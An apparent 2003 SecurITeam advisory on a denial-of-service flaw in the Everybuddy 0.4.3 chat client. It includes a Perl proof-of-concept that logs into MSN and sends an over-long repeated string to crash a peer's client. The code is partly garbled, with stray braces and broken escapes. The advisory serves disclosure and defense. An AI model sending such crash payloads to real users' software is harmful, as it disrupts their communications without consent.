‘Everybuddy Vulnerable to a DoS Attack (Long Message)’
Summary
‘Everybuddy has support for AIM, ICQ, MSN, Yahoo! and Jabber chat programs, the program contains a security vulnerability that allows remote attackers to cause the program to crash by sending it an overly long message (instant message).’
Credit:
‘The information has been provided by Noam Rathaus and SecurITeam Experts.’
Details
‘Vulnerable systems:
* Everybuddy version 0.4.3
Exploit:
The exploit code will login as a user, wait for someone to talk to him, and send him the attack string.
#!/usr/bin/perl
use MSN; # from http://www.adamswann.com/library/2002/msn-perl/
my $client = MSN->new();
$client->connect(’email address’, ‘password’, ”, {
Status => &Status,
Answer => &Answer,
Message => &Message,
Join => &Join }
);
sub Status {
my ($self, $username, $newstatus) = @_;
print ‘Status() called with parameters:n’;
print ‘ ‘ . join(‘,’, @_), ‘n’;
# Print the status change info.
print ‘${username}’s status changed from ‘ . $self->buddystatus($username) . ‘ to $newstatus.n’;
# Initiate the call.
$self->call($username);
# The call may take a few seconds to complete, so we can’t
# immediately send messages. Let’s put the message in a
# FIFO (queue) that is keyed by username.
push (@{$queue{$username}}, ‘Glad to see you online!’);
}
}
sub Message {
my ($self, $username, undef, $msg) = @_;
print ‘Message() called with parameters:n’;
print ‘ ‘ . join(‘,’, @_), ‘n’;
}
sub Join {
my ($self, $username) = @_;
print ‘Join() called with parameters:n’;
print ‘ ‘ . join(‘,’, @_), ‘n’;
# See if there’s anything queued up.
# Deliver each message if there is stuff in the queue for this user.
while ($_ = shift @{$queue{$username}}) {
$$self->sendmsg($_);
}
}
sub Answer {
my ($self, $username) = @_;
print ‘Answer() called with parameters:n’;
print ‘ ‘ . join(‘,’, @_), ‘n’;
# Send a hello message.
$$self->sendmsg(‘AAAAAAAAAAAAAAAAAAAAAAAAAAAr’x55);
}
Vendor status:
After numerous attempts to contact the vendor (in some cases the vendor replied, but then disappeared again), we are forced to release this information, without receiving a proper response from them.
Disclosure timeline:
19/06/2003 – First attempt to contact vendor
20/06/2003 – First vendor response
22/06/2003 – PoC provided to vendor
01/07/2003 – Second attempt to contact vendor
01/08/2003 – Third attempt to contact vendor
05/08/2003 – Public advisory’